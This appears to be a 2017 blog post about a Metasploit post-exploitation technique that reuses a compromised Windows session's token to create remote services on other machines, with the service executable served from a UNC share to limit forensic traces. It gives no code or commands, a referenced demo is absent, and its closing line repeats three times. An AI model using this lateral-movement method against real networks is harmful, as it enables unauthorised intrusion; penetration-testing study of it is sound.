Last updated at Wed, 30 Aug 2017 16:03:45 GMT

At DEF CON this year I talked about some of the post exploitation capabilities within Metasploit and demo'd a cool technique I developed with Jabra on a pentest a year or so ago (I later found out that Mubix had come up with basically the same idea - great minds think alike). It is essentially this: use a session's current token to create a remote service on a victim machine.

It takes advantage of a feature in Windows that most people take completely for granted. Given that you are already logged in to your desktop machine, you can browse around on shares as yourself transparently due to Windows' security token mechanism. This extends to more than just file shares, and to more than just console logins. If your user has Local Administrator access on the target machine, you can also fiddle with the registry and start/stop services, all without knowing a password or hash. Anyone familiar with how psexec works will notice the awesomesauce here.

When doing a normal psexec, metasploit uploads an exe to the remote system and uses that as the service executable. It turns out the Windows API allows UNC paths for service executables, and since we have control of a system already on the network, we can reduce the forensics footprint on the network overall by just upload it to the compromised machine. Then we start up a file share, and set all the victims to use a UNC path to that share, resulting in only one filesystem containing the actual executable file, and only for as long as you're running the module. Here's the module in action:


I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.

I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.

I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.